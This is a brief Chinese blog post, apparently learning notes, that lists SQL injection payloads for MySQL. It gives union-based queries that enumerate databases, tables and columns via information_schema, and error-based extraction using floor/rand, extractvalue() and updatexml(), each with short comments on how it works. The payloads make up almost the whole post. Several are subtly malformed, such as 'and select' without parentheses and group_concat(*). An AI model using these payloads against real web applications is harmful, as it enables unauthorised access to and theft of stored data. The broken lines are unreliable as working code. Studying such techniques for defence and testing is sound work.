union聯(lián)合查詢注入&&報(bào)錯注入

union聯(lián)合查詢注入

xx' union select database()
xx' union select table_name from information_schema.tables where table_schema ='DATABASE'
xx' union select column_name from information_schema.columns where table_name='TABLE'
xx' union select group_concat(*)/concat(0x7e,COLUMN1,0x7e,COLUMN2) from DATABASE.TABLE

報(bào)錯注入

floor()+count(*)+concat()+rand(0)*2+group by
#其實(shí)是group by 和count(*)和rand()的化學(xué)反應(yīng),缺一不可
xx' and select count(*) from information_schema.tables group by concat(0x7e,(SELECT VERSION()),0x7e,floor(rand(0)*2))

extractvalue()
#第二個參數(shù)XPath不符合格式的符號包括其后報(bào)錯
xx' and select extractvalue(1,concat(0x7e,(SELECT VERSION()),0x7e))

updatexml()
#無需使用select,其他同上
xx' and updatexml(1,concat(0x7e,(SELECT VERSION()),0x7e),1)
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • web應(yīng)用程序會對用戶的輸入進(jìn)行驗(yàn)證,過濾其中的一些關(guān)鍵字,這種過濾我們可以試著用下面的方法避開。 1、 不使用被...
    查無此人asdasd閱讀 7,656評論 0 5
  • 本周主要學(xué)習(xí)的事SQL注入相關(guān)的細(xì)節(jié)信息,包括數(shù)據(jù)庫枚舉方式,判定注入點(diǎn)的方式,注入形式等等,具體如下: 【一、判...
    快遞_小哥閱讀 1,270評論 0 1
  • 姓名:于川皓 學(xué)號:16140210089 轉(zhuǎn)載自:https://baike.baidu.com/item/sq...
    道無涯_cc76閱讀 2,045評論 0 2
  • Sql注入定義: 就是通過把sql命令插入到web表單提交或輸入域名或頁面請求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行...
    付出從未后悔閱讀 754評論 0 3
  • 一、為什么選擇Activiti 二、核心7大接口、28張表 (一)7大接口 RepositoryService:提...
    jessehua閱讀 127,616評論 130 194

友情鏈接更多精彩內(nèi)容